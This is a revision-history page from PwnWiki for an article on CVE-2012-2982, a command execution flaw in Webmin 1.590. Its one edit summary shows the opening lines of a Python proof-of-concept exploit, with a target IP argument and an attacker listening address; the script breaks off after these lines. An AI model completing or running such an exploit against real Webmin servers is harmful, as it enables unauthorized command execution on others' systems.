Revision history of "CVE-2012-2982 Webmin 1.590任意命令執行漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 14:17, 4 April 2021Pwnwiki talk contribs 3,851 bytes +3,851 Created page with "==POC== ===web.py=== <pre> #!/usr/bin/env python #usage: python3 web.py <targetIP> import sys, requests, string, secrets targetIP = sys.argv[1] lhost = "10.10.10.10" #attack..."